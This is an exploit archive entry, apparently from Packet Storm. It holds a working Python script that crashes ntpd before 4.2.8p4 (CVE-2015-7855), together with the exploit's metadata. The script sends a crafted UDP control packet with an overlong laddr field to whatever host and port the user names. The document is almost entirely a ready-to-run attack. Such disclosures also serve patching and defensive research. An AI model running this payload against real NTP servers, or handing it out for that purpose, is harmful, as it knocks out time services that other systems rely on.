NTP 4.2.8p3 Denial Of Service

2016-11-25T00:00:00
ID PACKETSTORM:139925
Type packetstorm
Reporter Magnus Klaaborg Stubman
Modified 2016-11-25T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
  
# Exploit Title: ntpd 4.2.8p3 remote DoS  
# Date: 2015-10-21  
# Bug Discovery: John D "Doug" Birdwell  
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)  
# Website: http://support.ntp.org/bin/view/Main/NtpBug2922  
# Vendor Homepage: http://www.ntp.org/  
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz  
# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77  
# CVE: CVE-2015-7855  
  
import sys  
import socket  
  
if len(sys.argv) != 3:  
print "usage: " + sys.argv[0] + " <host> <port>"  
sys.exit(-1)  
  
payload = "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"  
  
print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."  
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))  
print "[+] Done!"  
  
  
  
`